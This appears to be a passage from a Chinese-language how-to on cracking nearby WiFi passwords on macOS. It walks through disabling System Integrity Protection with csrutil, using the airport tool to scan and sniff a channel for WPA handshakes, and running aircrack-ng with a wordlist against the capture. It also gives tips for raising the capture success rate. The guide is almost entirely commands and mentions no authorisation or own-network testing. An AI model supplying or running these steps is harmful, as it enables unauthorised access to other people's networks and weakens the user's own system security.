首先需解除rootless內核保護(內核保護會對\usr、\sbin禁止root權限,下面操作需用到\usr因此需解除rootless),解除方法為重啟中按住Command + R鍵,出現實用工具界面,在菜單欄打開terminal;
解除內核保護,輸入:csrutil disable
重啟,輸入:reboot
給airport指定路徑:
sudo ln -s? /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/
Resources/airport? /usr/sbin/airport
2. 查看附近WiFi信息
在終端內輸入如下命令,就能看到 airport 監測到的附近 wifi 信息:
airport -s
SSID 是 wifi名稱,RSSI 是信號強度,CHANNEL 是信道。
3. 抓包
挑選壹個信號強的信道進行監聽抓包(比如信道1),在終端輸入:
sudo airport en0 sniff? 1
命令中的 en0 是自己電腦的網卡地址,有的電腦可能是 en1,根據自己的實際情況進行輸入,查看電腦網卡地址的地方如下:
ifconfig -a
大概等待2-5分鐘就可以按 command + c 組合鍵退出查看含有抓包的cap文件了,文件所在地址是/tmp,可以使用Finder的前往文件夾功能進入:
可以將cap文件移到我們想保存的地方,也可以不移走(重啟後就沒有了)。
4.破解WiFi密碼
先在桌面建壹個文件夾,取名「wifi」,將字典和cap文件都放到這個文件夾內(假設字典是01.txt,cap文件名是01.cap,在終端輸入:
cd ~/Desktop/wifi
aircrack-ng -w 01.txt 01.cap
就可以看到cap文件內的抓包情況,Encryption中(0 handshake)是抓包失敗,(1 handshake)則是抓包成功。如看到第11行抓包成功,則在「Index number of target network ?」這裏輸入11後敲回車:
如果cap文件內全是(0 handshake),就按 command + c 組合鍵退出。重新回到「sudo airport en0 sniff 1」這步進行監聽抓包。抓包成功率受到 wifi 信號強弱、電腦與路由器距離遠近、路由器是否正處在收發數據狀態的影響。總之多試幾次、監聽時間適當延長些,可以大大提高成功率。